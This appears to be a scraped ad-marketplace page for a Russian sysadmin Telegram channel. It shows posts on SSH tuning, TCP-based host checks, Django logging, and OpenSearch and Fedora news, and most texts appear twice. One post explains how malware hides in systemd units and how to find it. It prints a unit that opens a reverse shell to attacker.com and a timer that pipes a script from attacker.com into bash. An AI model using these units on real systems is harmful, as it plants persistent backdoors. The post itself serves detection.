
🌸 Майская распродажа
Скидки до 70% в каталоге + дополнительно 3,5% по промокоду 75D80F4B
В каталог
73.9

Admin Guides | Сисадмин
4.9
51
Интернет технологии
932
34
Обучающий канал для сетевых и системных админов. Администрирование Windows/Linux, DevOps, База данных, Компьютерные сети, Bash, Программирование Bash, Python, SQL, Информационная безопасность, Хакатон, СХД.
Поделиться
В избранное
Купить рекламу в этом канале
Формат:
keyboard_arrow_down
- 1/24
- 2/48
- 3/72
- Нативный
- 7 дней
- Репост
1 час в топе / 24 часа в ленте
Количество:
%keyboard_arrow_down
- 1
- 2
Стоимость публикации:
local_activity
4 195.80₽3 356.64₽local_mall
20.0%
Осталось по этой цене:2
Последние посты канала
imageИзображение не доступно для предпросмотра
Ускоряем SSH: как избавиться от задержки в 3 секунды
Вы заходите на сервер по SSH, и перед тем как появится приглашение ввести пароль — пауза. Иногда целых 2–5 секунд. Почему так?
Виновник — GSSAPIAuthentication.
SSH по умолчанию пытается авторизоваться через Kerberos (GSSAPI), даже если вы им не пользуетесь.
Как решить:
1️⃣ Отключите на клиенте (вашем компьютере):
Откройте или создайте файл ~/.ssh/config и добавьте:
2️⃣ Хотите на сервере — можно и так:
Файл /etc/ssh/sshd_config, найдите строку:
и замените на:
После чего:
Вы заходите на сервер по SSH, и перед тем как появится приглашение ввести пароль — пауза. Иногда целых 2–5 секунд. Почему так?
Виновник — GSSAPIAuthentication.
SSH по умолчанию пытается авторизоваться через Kerberos (GSSAPI), даже если вы им не пользуетесь.
Это особенно заметно, если DNS или обратное имя хоста не настроены идеально. В итоге клиент ждёт ответа, которого не будет.
Как решить:
Откройте или создайте файл ~/.ssh/config и добавьте:
Host *
GSSAPIAuthentication no
Файл /etc/ssh/sshd_config, найдите строку:
GSSAPIAuthentication yes
и замените на:
GSSAPIAuthentication no
После чего:
sudo systemctl restart sshd
313
13:04
15.05.2025
play_circleВидео недоступно для предпросмотра
Merion Academy – раздает пользу. У них на образовательной платформе есть целый раздел с бесплатными уроками по DevOps, Сетям, Программированию C#, Python, Java, Кибербезопу, Сетевому безопу, Этичному Хакингу, куча вебинаров и других полезностей – все они доступны бесплатно.
Лайфхак в том, что даже если вы не их ученик – т.е. не платили за курсы, доступ можно получить абсолютно бесплатно, схема рабочая:
1. По ссылке регаем новый аккаунт
2. Получаем доступ к платформе
3. Залезаем в раздел "Плюшки от Merion"
4. Выбираем понравившееся и получаем пользу
Лайфхак в том, что даже если вы не их ученик – т.е. не платили за курсы, доступ можно получить абсолютно бесплатно, схема рабочая:
1. По ссылке регаем новый аккаунт
2. Получаем доступ к платформе
3. Залезаем в раздел "Плюшки от Merion"
4. Выбираем понравившееся и получаем пользу
504
07:05
15.05.2025
imageИзображение не доступно для предпросмотра
Пинг без ICMP: как проверить доступность, если всё закрыто
Когда вы работаете с инфраструктурой, где ICMP-запросы блокируются (например, корпоративные фаерволы, жесткие политики безопасности или хостинг-провайдеры), привычный ping перестаёт быть полезным.
Но проверка доступности хоста или сервиса по-прежнему нужна. Что делать?
Альтернативы ICMP-пингу:
1️⃣ TCP ping через nmap, nc или telnet — подключаемся к порту:
или
2️⃣ curl или wget — если работает HTTP(S), можно проверить ответ сервиса:
3️⃣ hping3 — мощный инструмент для TCP/UDP/ICMP-проверок с возможностью задать порты и заголовки вручную:
4️⃣ fping — массовый ping, умеет работать и без ICMP при нужных флагах.
5️⃣ PowerShell (для Windows-серверов):
Когда вы работаете с инфраструктурой, где ICMP-запросы блокируются (например, корпоративные фаерволы, жесткие политики безопасности или хостинг-провайдеры), привычный ping перестаёт быть полезным.
Но проверка доступности хоста или сервиса по-прежнему нужна. Что делать?
Альтернативы ICMP-пингу:
nc -zv 192.168.0.1 22
или
nmap -p 80 192.168.0.1
curl -Is http://example.com | head -n 1
hping3 -S -p 80 example.com
Test-NetConnection -ComputerName example.com -Port 443
1500
11:50
14.05.2025
imageИзображение не доступно для предпросмотра
▶️ БЕСПЛАТНЫЙ МАСТЕР-КЛАСС «Linux: от основ к профессиональному использованию»
14 мая в 19:00 (МСК) | Онлайн | Бесплатно
✔️Регистрация
Linux уже давно перестал быть инструментом исключительно для системных администраторов. Сегодня это необходимый навык для DevOps-инженеров, специалистов по кибербезопасности и всех, кто работает с IT-инфраструктурой.
На нашем вебинаре мы:
▪️ Развеем мифы о сложности Linux и покажем, как начать работать с ним уверенно
▪️ Продемонстрируем практическое применение в реальных рабочих задачах
▪️ Расскажем о карьерных перспективах для специалистов, владеющих Linux
▪️ Дадим пошаговый алгоритм освоения системы
Особое внимание уделим:
✔ Работе с терминалом (основные команды и их применение)
✔ Решению типовых задач системного администрирования
✔ Возможностям для профессионального роста
Ведущий: Дмитрий Семьянов — действующий специалист по пентесту, куратор курса «Основы Linux».
Не пропустите! Регистрация здесь.
🚀 Трудности с регистрацией? Пишите @Codeby_Academy
14 мая в 19:00 (МСК) | Онлайн | Бесплатно
✔️Регистрация
Linux уже давно перестал быть инструментом исключительно для системных администраторов. Сегодня это необходимый навык для DevOps-инженеров, специалистов по кибербезопасности и всех, кто работает с IT-инфраструктурой.
На нашем вебинаре мы:
▪️ Развеем мифы о сложности Linux и покажем, как начать работать с ним уверенно
▪️ Продемонстрируем практическое применение в реальных рабочих задачах
▪️ Расскажем о карьерных перспективах для специалистов, владеющих Linux
▪️ Дадим пошаговый алгоритм освоения системы
Особое внимание уделим:
✔ Работе с терминалом (основные команды и их применение)
✔ Решению типовых задач системного администрирования
✔ Возможностям для профессионального роста
Ведущий: Дмитрий Семьянов — действующий специалист по пентесту, куратор курса «Основы Linux».
Не пропустите! Регистрация здесь.
🚀 Трудности с регистрацией? Пишите @Codeby_Academy
1500
09:04
14.05.2025
imageИзображение не доступно для предпросмотра
Пишем журналы в Django.
Часть 2
Вы настроили ведение логов в Django и теперь хотите увидеть, как это работает в действии?
Когда пользователь заходит на главную, мы выводим «Hello FreeCodeCamp.org Reader :)», а в лог warning.log записываем, что кто-то заходил на страницу и когда именно.
1️⃣ Создаём проект и виртуальное окружение
2️⃣ Устанавливаем Django
3️⃣ Создаём проект и приложение
4️⃣ Добавляем приложение в INSTALLED_APPS
Откройте settings.py и добавьте 'logging_example', в список приложений:
5️⃣ Добавляем конфигурацию логирования в settings.py
(Если ещё не добавляли)
Создайте папку logs:
6️⃣ Пишем код логирования
views.py в приложении logging_example:
7️⃣ Настраиваем маршруты
В urls.py основного проекта:
8️⃣ Запуск и тестирование
Запустите сервер разработки:
Откройте в браузере
Часть 2
Вы настроили ведение логов в Django и теперь хотите увидеть, как это работает в действии?
Давайте добавим простую домашнюю страницу и настроим журналирование каждого её посещения.
Когда пользователь заходит на главную, мы выводим «Hello FreeCodeCamp.org Reader :)», а в лог warning.log записываем, что кто-то заходил на страницу и когда именно.
mkdir django-logging-tutorial
cd django-logging-tutorial
python3 -m venv venv
source venv/bin/activate
pip install django
django-admin startproject django_logging_tutorial .
python manage.py startapp logging_example
Откройте settings.py и добавьте 'logging_example', в список приложений:
INSTALLED_APPS = [
...
'logging_example',
]
(Если ещё не добавляли)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'WARNING',
'class': 'logging.FileHandler',
'filename': 'logs/warning.log',
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'WARNING',
'propagate': True,
},
},
}
Создайте папку logs:
mkdir logs
views.py в приложении logging_example:
from django.http import HttpResponse
import datetime
import logging
logger = logging.getLogger(__name__)
def hello_reader(request):
logger.warning('Homepage was accessed at ' + str(datetime.datetime.now()) + ' hours!')
return HttpResponse("<h1>Hello FreeCodeCamp.org Reader :)</h1>")
В urls.py основного проекта:
from django.contrib import admin
from django.urls import path
from logging_example import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.hello_reader, name="hello_reader")
]
Запустите сервер разработки:
python manage.py runserver
Откройте в браузере
http://127.0.0.1:8000/
и несколько раз обновите страницу. Затем проверьте файл logs/warning.log. Там появится что-то вроде:Homepage was accessed at 2025-05-07 22:38:29.922510 hours!
Homepage was accessed at 2025-05-07 22:48:35.088296 hours!
1300
14:44
13.05.2025
imageИзображение не доступно для предпросмотра
В среду 14 мая в 11:00 мск разберём, как добавить чат-ботов в корпоративный мессенджер с помощью нового инструмента — TrueConf Chatbot Connector.
Что можно реализовать быстро и без лишней боли:
Присоединяйтесь, будет live-coding, но без «у меня всё сломалось» (мы тестили).
1500
12:38
13.05.2025
imageИзображение не доступно для предпросмотра
Релиз OpenSearch 3.0: что нового?
OpenSearch 3.0 — свежий релиз проекта от OpenSearch Software Foundation под крылом Linux Foundation. Это форк Elasticsearch и Kibana, созданный в 2021 году после перехода Elastic на несвободную лицензию.
Проект активно развивают Amazon, SAP, Uber, Canonical и другие, а код распространяется под Apache 2.0.
Что нового в 3.0:
⏺ Векторный движок с поддержкой GPU: ускорение поиска и интеграция с LLM (LangChain, OpenAI и др.).
⏺ Оптимизация хранения векторов: до 30 раз быстрее холодный старт, меньше места.
⏺ Поддержка gRPC: передача данных быстрее и с меньшими накладными расходами.
⏺ Подключение потоков: прямой pull из Kafka и Kinesis.
⏺ Разделение трафика: чтение и запись теперь можно разнести.
⏺ PPL и Calcite: расширенные SQL-возможности.
⏺ Автоопределение типов индексов: улучшено логирование.
⏺ Lucene 10 и Java 21: новая производительность, модульность, параллелизм, +25–75% в скорости на тестах.
Проект остаётся опенсорсной альтернативой Elasticsearch с фокусом на расширяемость и интеграции с ML/AI.
OpenSearch 3.0 — свежий релиз проекта от OpenSearch Software Foundation под крылом Linux Foundation. Это форк Elasticsearch и Kibana, созданный в 2021 году после перехода Elastic на несвободную лицензию.
Проект активно развивают Amazon, SAP, Uber, Canonical и другие, а код распространяется под Apache 2.0.
Что нового в 3.0:
Проект остаётся опенсорсной альтернативой Elasticsearch с фокусом на расширяемость и интеграции с ML/AI.
1600
04:05
13.05.2025
imageИзображение не доступно для предпросмотра
Ведение журналов в Django: как отлаживать проект, не лезя в консоль
Единственный совершенный код — это код, который так и не написали. А если вы его всё-таки написали — будьте готовы отлаживать.
Django уже поставляется с поддержкой логирования через стандартный модуль logging, и настроить его можно за 5 минут. Главное — понимать, что и зачем вы пишете в логи.
Что такое логирование в Python?
Это механизм для записи сообщений об ошибках, предупреждениях, событиях и внутренних действиях системы. Он позволяет:
• понимать, что пошло не так и где это произошло;
• воспроизводить баги;
• видеть поведение фоновых задач, сигналов, миграций, API-запросов.
4 ключевых компонента системы логов Django:
1️⃣ Logger — точка входа. Вызываете logger.warning("Что-то пошло не так").
2️⃣ Handler — указывает, куда писать: в файл, на консоль, в e-mail.
3️⃣ Filter — фильтрует сообщения по условиям: уровень, модуль, пользователь.
4️⃣ Formatter — форматирует вывод: добавляет timestamp, уровень, текст и т.п.
Пример настройки логов в settings.py:
Этот код отправляет все WARNING и выше в warning.log.
Хочется видеть критические ошибки на почте? Добавьте AdminEmailHandler.
Хотите писать SQL-запросы в лог? Подключите django.db.backends.
Где это реально помогает:
⏺ debug фоновых задач Celery, которые отвалились без трейсбека;
⏺ отладка middleware и ранних исключений;
⏺ логирование пользовательских действий, если нет Sentry;
⏺ поиск редких ошибок в проде, которые не воспроизводятся на локалке.
Единственный совершенный код — это код, который так и не написали. А если вы его всё-таки написали — будьте готовы отлаживать.
Чтобы не разбираться с ошибками “на глаз”, используйте логирование: это ваша чёрная коробка, в которую пишет всё, что происходит в приложении.
Django уже поставляется с поддержкой логирования через стандартный модуль logging, и настроить его можно за 5 минут. Главное — понимать, что и зачем вы пишете в логи.
Что такое логирование в Python?
Это механизм для записи сообщений об ошибках, предупреждениях, событиях и внутренних действиях системы. Он позволяет:
• понимать, что пошло не так и где это произошло;
• воспроизводить баги;
• видеть поведение фоновых задач, сигналов, миграций, API-запросов.
4 ключевых компонента системы логов Django:
Пример настройки логов в settings.py:
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'WARNING',
'class': 'logging.FileHandler',
'filename': BASE_DIR / 'warning.log',
},
},
'loggers': {
'': {
'handlers': ['file'],
'level': 'WARNING',
'propagate': True,
},
},
}
Этот код отправляет все WARNING и выше в warning.log.
Хочется видеть критические ошибки на почте? Добавьте AdminEmailHandler.
Хотите писать SQL-запросы в лог? Подключите django.db.backends.
Где это реально помогает:
1500
11:32
12.05.2025
imageИзображение не доступно для предпросмотра
Backdoor в systemd: нестандартные юниты и что туда могут спрятать
В продакшене всё чаще встречаются случаи, когда вредонос не сидит в /etc/rc.local, crontab или .bashrc, а встраивается прямо в systemd. Причём аккуратно, с видом “службы мониторинга” или “агента безопасности”.
1. Маскировка reverse shell под systemd-сервис
Простой пример unit-файла, запускающего обратную оболочку:
Такой юнит можно сохранить в /etc/systemd/system/sys-health.service и активировать через systemctl enable --now sys-health.service. На глаз — просто очередная служба.
2. Распределённый запуск через таймер
Юниты можно запускать не постоянно, а по расписанию, как cron:
Такой таймер будет запускать бекдор раз в 6 часов — и его легко упустить, особенно если не смотрите systemctl list-timers.
3. Примеры более изощрённого поведения
Некоторые вредоносы:
• подсовывают юниты в ~/.config/systemd/user/, чтобы не требовать root-доступа;
• используют бинарники с нейтральными названиями (/usr/local/bin/kworker или /opt/metricsd);
• пишут логи в /dev/null или ExecStartPre=/bin/sleep 60, чтобы избежать подозрений по таймингу.
4. Как искать такие юниты
⏺ systemctl list-units --type=service --all — ищем странные описания и пути к исполняемым файлам.
⏺ systemctl cat <unit> — посмотреть полный юнит.
⏺ find /etc/systemd/ /lib/systemd/ ~/.config/systemd/ -name "*.service" — ручной обход.
⏺ Проверка таймеров: systemctl list-timers --all.
В продакшене всё чаще встречаются случаи, когда вредонос не сидит в /etc/rc.local, crontab или .bashrc, а встраивается прямо в systemd. Причём аккуратно, с видом “службы мониторинга” или “агента безопасности”.
Разбираем, как через systemd можно спрятать обратную оболочку или исполнять вредоносный код по расписанию — и как это обнаружить.
1. Маскировка reverse shell под systemd-сервис
Простой пример unit-файла, запускающего обратную оболочку:
[Unit]
Description=System Health Monitor
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
Такой юнит можно сохранить в /etc/systemd/system/sys-health.service и активировать через systemctl enable --now sys-health.service. На глаз — просто очередная служба.
2. Распределённый запуск через таймер
Юниты можно запускать не постоянно, а по расписанию, как cron:
# /etc/systemd/system/collect.timer
[Unit]
Description=Collect stats timer
[Timer]
OnBootSec=5min
OnUnitActiveSec=6h
Unit=collect.service
[Install]
WantedBy=timers.target
# /etc/systemd/system/collect.service
[Unit]
Description=Run data collector
[Service]
ExecStart=/usr/bin/curl -s http://attacker.com/payload.sh | bash
Такой таймер будет запускать бекдор раз в 6 часов — и его легко упустить, особенно если не смотрите systemctl list-timers.
3. Примеры более изощрённого поведения
Некоторые вредоносы:
• подсовывают юниты в ~/.config/systemd/user/, чтобы не требовать root-доступа;
• используют бинарники с нейтральными названиями (/usr/local/bin/kworker или /opt/metricsd);
• пишут логи в /dev/null или ExecStartPre=/bin/sleep 60, чтобы избежать подозрений по таймингу.
4. Как искать такие юниты
2300
09:05
09.05.2025
imageИзображение не доступно для предпросмотра
Fedora Linux 42 теперь официально в WSL
Microsoft добавила Fedora Linux 42 в список официально поддерживаемых дистрибутивов WSL (Windows Subsystem for Linux).
Если вы на Windows 11 с WSL2 — достаточно одной команды:
Запуск:
Fedora 42 можно использовать как полноценную рабочую среду: внутри — GNOME 48, KDE Plasma 6.3, ядро 6.14, GCC 15, PHP 8.4, Ruby 3.4, Ansible 11 и многое другое. Работает на x86_64, ARM64 и даже Power64.
Microsoft уже добавила GUI-интерфейс для управления дистрибутивами в WSL и продолжает развивать поддержку графических приложений прямо внутри Fedora.
Microsoft добавила Fedora Linux 42 в список официально поддерживаемых дистрибутивов WSL (Windows Subsystem for Linux).
Если вы на Windows 11 с WSL2 — достаточно одной команды:
wsl --install FedoraLinux-42
Запуск:
wsl -d FedoraLinux-42
Fedora 42 можно использовать как полноценную рабочую среду: внутри — GNOME 48, KDE Plasma 6.3, ядро 6.14, GCC 15, PHP 8.4, Ruby 3.4, Ansible 11 и многое другое. Работает на x86_64, ARM64 и даже Power64.
Microsoft уже добавила GUI-интерфейс для управления дистрибутивами в WSL и продолжает развивать поддержку графических приложений прямо внутри Fedora.
Теперь можно обойтись без двойной загрузки или VM — всё внутри Windows.
2200
04:05
09.05.2025
close
Спецпредложения
5 каналов

Каналов
5
42.6K
lock_outline
CPV
lock_outline13 566.42 ₽₽
12 209.78 ₽₽
-10%
2 канала

С этим каналом часто покупают
Отзывы канала
keyboard_arrow_down
- Добавлен: Сначала новые
- Добавлен: Сначала старые
- Оценка: По убыванию
- Оценка: По возрастанию
4.9
15 отзыва за 6 мес.
Превосходно (94%) За последние 6 мес
Хорошо (7%) За последние 6 мес
c
**debycodeby@******.ru
на сервисе с февраля 2025
14.05.202512:49
5
Четкое соблюдение ТЗ
Показать еще
Новинки в тематике
Лучшие в тематике
Статистика канала
Рейтинг
73.9
Оценка отзывов
4.9
Выполнено заявок
179
Подписчики:
11.3K
Просмотры на пост:
lock_outline
ER:
11.4%
Публикаций в день:
2.0
CPV
lock_outlineВыбрано
0
каналов на сумму:0.00₽
Подписчики:
0
Просмотры:
lock_outline
Перейти в корзинуКупить за:0.00₽
Комментарий